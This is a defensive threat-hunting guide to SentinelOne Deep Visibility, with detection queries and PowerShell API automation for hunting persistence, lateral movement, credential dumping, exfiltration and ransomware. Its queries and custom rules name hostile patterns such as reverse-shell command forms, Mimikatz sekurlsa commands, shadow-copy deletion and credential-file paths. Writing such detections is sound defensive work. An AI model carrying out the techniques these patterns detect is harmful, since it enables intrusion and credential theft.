Overview
SentinelOne's Deep Visibility provides real-time telemetry for threat hunting across your entire endpoint fleet. This guide covers practical threat hunting techniques, from basic queries to advanced IOC detection.
What You'll Learn
- Deep Visibility query syntax and operators
- Process tree analysis for attack detection
- Hunting for persistence mechanisms
- Lateral movement detection
- Building custom detection rules
- PowerShell API automation
Why Deep Visibility?
| Traditional AV | SentinelOne Deep Visibility |
|---|---|
| Signature-based | Behavioral analysis |
| Post-infection alerts | Real-time telemetry |
| Limited forensics | Full process history |
| Manual investigation | Query-based hunting |
Deep Visibility Query Basics
Deep Visibility uses a SQL-like query language to search endpoint telemetry.
Query Structure
EventType = "Process Creation"
AND ProcessName = "powershell.exe"
AND ProcessCmdLine Contains "-enc"Common Operators
| Operator | Description | Example |
|---|---|---|
= | Exact match | ProcessName = "cmd.exe" |
Contains | Substring match | ProcessCmdLine Contains "mimikatz" |
StartsWith | Prefix match | FilePath StartsWith "C:\Temp" |
In | Multiple values | ProcessName In ("cmd.exe", "powershell.exe") |
RegExp | Regex match | ProcessCmdLine RegExp "base64" |
Event Types
Process Creation - New process started
Process Exit - Process terminated
File Creation - New file written
File Modification - Existing file changed
Registry Key Creation - New registry key
Registry Value Set - Registry value modified
Network Connection - Outbound connection
DNS Query - DNS resolutionHunting for Suspicious Processes
Encoded PowerShell Commands
Attackers frequently use Base64-encoded PowerShell to evade detection:
EventType = "Process Creation"
AND ProcessName = "powershell.exe"
AND (
ProcessCmdLine Contains "-enc" OR
ProcessCmdLine Contains "-EncodedCommand" OR
ProcessCmdLine Contains "-e " OR
ProcessCmdLine Contains "FromBase64String"
)Living Off the Land (LOLBins)
Hunt for abuse of legitimate Windows binaries:
EventType = "Process Creation"
AND ProcessName In (
"certutil.exe",
"bitsadmin.exe",
"mshta.exe",
"regsvr32.exe",
"rundll32.exe",
"wmic.exe",
"msiexec.exe"
)
AND (
ProcessCmdLine Contains "http" OR
ProcessCmdLine Contains "ftp" OR
ProcessCmdLine Contains "/transfer"
)Suspicious Parent-Child Relationships
Detect unusual process spawning patterns:
EventType = "Process Creation"
AND ParentProcessName = "outlook.exe"
AND ProcessName In ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")EventType = "Process Creation"
AND ParentProcessName = "winword.exe"
AND ProcessName Not In ("splwow64.exe")Persistence Mechanism Detection
Scheduled Tasks
Hunt for malicious scheduled task creation:
EventType = "Process Creation"
AND ProcessName = "schtasks.exe"
AND ProcessCmdLine Contains "/create"More specific - tasks running from suspicious locations:
EventType = "Process Creation"
AND ProcessName = "schtasks.exe"
AND (
ProcessCmdLine Contains "AppData" OR
ProcessCmdLine Contains "Temp" OR
ProcessCmdLine Contains "ProgramData" OR
ProcessCmdLine RegExp "C:\\Users\\[^\\]+\\Downloads"
)Registry Run Keys
Detect persistence via registry:
EventType = "Registry Value Set"
AND RegistryPath Contains "CurrentVersion\Run"EventType = "Registry Value Set"
AND RegistryPath In (
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
)WMI Event Subscriptions
Advanced persistence technique:
EventType = "Process Creation"
AND ProcessName = "wmic.exe"
AND ProcessCmdLine Contains "EventConsumer"Lateral Movement Detection
PsExec and Remote Execution
EventType = "Process Creation"
AND ProcessName In ("psexec.exe", "psexec64.exe", "paexec.exe")Service-based lateral movement:
EventType = "Process Creation"
AND ProcessName = "sc.exe"
AND ProcessCmdLine Contains "\\\"
AND ProcessCmdLine Contains "create"WMI Remote Execution
EventType = "Process Creation"
AND ProcessName = "wmic.exe"
AND ProcessCmdLine Contains "/node:"
AND ProcessCmdLine Contains "process call create"Pass-the-Hash Indicators
EventType = "Process Creation"
AND ProcessName = "sekurlsa.exe"
OR (
ProcessName = "mimikatz.exe" OR
ProcessCmdLine Contains "sekurlsa::logonpasswords"
)RDP Connections
EventType = "Network Connection"
AND DstPort = 3389
AND ConnectionStatus = "SUCCESS"Credential Access Detection
LSASS Access
Credential dumping attempts:
EventType = "Process Access"
AND TargetProcessName = "lsass.exe"
AND SourceProcessName Not In (
"csrss.exe",
"wininit.exe",
"services.exe"
)SAM Database Access
EventType = "File Read"
AND FilePath Contains "system32\config\SAM"Credential File Access
EventType = "File Read"
AND (
FilePath Contains "Credentials" OR
FilePath Contains ".rdp" OR
FilePath Contains "ntds.dit" OR
FileName RegExp "\.(ppk|pem|key)$"
)Data Exfiltration Detection
Large Outbound Transfers
EventType = "Network Connection"
AND ConnectionDirection = "OUTBOUND"
AND NetworkBytes > 10000000Cloud Storage Uploads
EventType = "DNS Query"
AND DnsQuery In (
"*.dropbox.com",
"*.drive.google.com",
"*.onedrive.live.com",
"*.mega.nz",
"*.pastebin.com"
)Archive Creation Before Exfil
EventType = "Process Creation"
AND ProcessName In ("7z.exe", "rar.exe", "zip.exe", "tar.exe")
AND ProcessCmdLine Contains "a "
| FollowedBy ProcessCreation
WHERE ProcessCmdLine Contains "http"
WITHIN 5 minutesPowerShell API Integration
Authentication
function Connect-SentinelOne {
param(
[Parameter(Mandatory)]
[string]$ConsoleUrl,
[Parameter(Mandatory)]
[string]$ApiToken
)
$script:S1Session = @{
BaseUrl = $ConsoleUrl.TrimEnd('/')
Headers = @{
"Authorization" = "ApiToken $ApiToken"
"Content-Type" = "application/json"
}
}
# Verify connection
try {
$response = Invoke-RestMethod `
-Uri "$($script:S1Session.BaseUrl)/web/api/v2.1/system/info" `
-Headers $script:S1Session.Headers `
-Method GET
Write-Host "Connected to SentinelOne" -ForegroundColor Green
Write-Host " Version: $($response.data.build)"
return $true
}
catch {
Write-Error "Connection failed: $_"
return $false
}
}Execute Deep Visibility Query
function Invoke-S1Query {
param(
[Parameter(Mandatory)]
[string]$Query,
[string]$FromDate = (Get-Date).AddDays(-7).ToString("yyyy-MM-ddTHH:mm:ss.fffZ"),
[string]$ToDate = (Get-Date).ToString("yyyy-MM-ddTHH:mm:ss.fffZ"),
[int]$Limit = 100
)
$body = @{
query = $Query
fromDate = $FromDate
toDate = $ToDate
limit = $Limit
} | ConvertTo-Json
$response = Invoke-RestMethod `
-Uri "$($script:S1Session.BaseUrl)/web/api/v2.1/dv/query" `
-Headers $script:S1Session.Headers `
-Method POST `
-Body $body
return $response.data
}
# Usage
$results = Invoke-S1Query -Query 'EventType = "Process Creation" AND ProcessName = "powershell.exe"'
$results | Select-Object endpointName, processCmd, createdAtAutomated Threat Hunt
function Start-ThreatHunt {
param(
[hashtable]$Queries,
[string]$OutputPath = ".\hunt-results"
)
New-Item -Path $OutputPath -ItemType Directory -Force | Out-Null
$findings = @()
foreach ($hunt in $Queries.GetEnumerator()) {
Write-Host "Running hunt: $($hunt.Key)..." -ForegroundColor Cyan
$results = Invoke-S1Query -Query $hunt.Value
if ($results.Count -gt 0) {
Write-Host " Found $($results.Count) matches" -ForegroundColor Yellow
$findings += [PSCustomObject]@{
Hunt = $hunt.Key
Query = $hunt.Value
Count = $results.Count
Results = $results
}
# Export results
$results | Export-Csv `
-Path "$OutputPath\$($hunt.Key -replace ' ', '-').csv" `
-NoTypeInformation
}
else {
Write-Host " No matches" -ForegroundColor Green
}
}
return $findings
}
# Define hunts
$hunts = @{
"Encoded PowerShell" = 'EventType = "Process Creation" AND ProcessName = "powershell.exe" AND ProcessCmdLine Contains "-enc"'
"LOLBin Download" = 'EventType = "Process Creation" AND ProcessName = "certutil.exe" AND ProcessCmdLine Contains "http"'
"Suspicious Tasks" = 'EventType = "Process Creation" AND ProcessName = "schtasks.exe" AND ProcessCmdLine Contains "AppData"'
}
# Execute hunt
$results = Start-ThreatHunt -Queries $huntsBuilding Custom Detection Rules
Star Custom Rule
Create rules from successful hunts:
function New-S1CustomRule {
param(
[Parameter(Mandatory)]
[string]$Name,
[Parameter(Mandatory)]
[string]$Query,
[ValidateSet("Low", "Medium", "High", "Critical")]
[string]$Severity = "Medium",
[string]$Description
)
$body = @{
data = @{
name = $Name
query = $Query
severity = $Severity
description = $Description
enabled = $true
}
} | ConvertTo-Json -Depth 5
$response = Invoke-RestMethod `
-Uri "$($script:S1Session.BaseUrl)/web/api/v2.1/star-custom-rules" `
-Headers $script:S1Session.Headers `
-Method POST `
-Body $body
Write-Host "Rule '$Name' created" -ForegroundColor Green
return $response.data
}Example Rules
# Detect Mimikatz
New-S1CustomRule `
-Name "Mimikatz Execution Detected" `
-Query 'ProcessCmdLine Contains "sekurlsa" OR ProcessCmdLine Contains "mimikatz"' `
-Severity "Critical" `
-Description "Detects Mimikatz credential dumping tool"
# Detect reverse shells
New-S1CustomRule `
-Name "Potential Reverse Shell" `
-Query 'ProcessCmdLine RegExp "nc.*-e|ncat.*-e|bash.*-i.*>&"' `
-Severity "High" `
-Description "Detects common reverse shell patterns"Ransomware Detection Queries
Mass File Encryption
EventType = "File Modification"
| GroupBy EndpointName, ProcessName
Having Count > 100
Within 1 minuteKnown Ransomware Extensions
EventType = "File Creation"
AND (
FileName EndsWith ".encrypted" OR
FileName EndsWith ".locked" OR
FileName EndsWith ".crypto" OR
FileName RegExp "\.[a-z]{5,10}$"
)
| GroupBy EndpointName
Having Count > 50Shadow Copy Deletion
EventType = "Process Creation"
AND (
(ProcessName = "vssadmin.exe" AND ProcessCmdLine Contains "delete shadows") OR
(ProcessName = "wmic.exe" AND ProcessCmdLine Contains "shadowcopy delete") OR
(ProcessName = "bcdedit.exe" AND ProcessCmdLine Contains "recoveryenabled no")
)Best Practices
- Start with known-good - Understand normal before hunting abnormal
- Tune for environment - Whitelist legitimate admin tools
- Document findings - Keep hunt notebooks with queries and results
- Automate repeatable hunts - Schedule weekly hunt routines
- Share IOCs - Feed findings back into SIEM and firewall rules
- Practice on red team exercises - Validate detection coverage
Query Reference Card
| Use Case | Query Pattern |
|---|---|
| Process by name | ProcessName = "malware.exe" |
| Command line search | ProcessCmdLine Contains "suspicious" |
| File in location | FilePath StartsWith "C:\Temp" |
| Network to IP | DstIp = "192.168.1.100" |
| DNS lookup | DnsQuery Contains "evil.com" |
| Registry persistence | RegistryPath Contains "CurrentVersion\Run" |
| Time-bounded | CreatedAt > "2024-01-01T00:00:00Z" |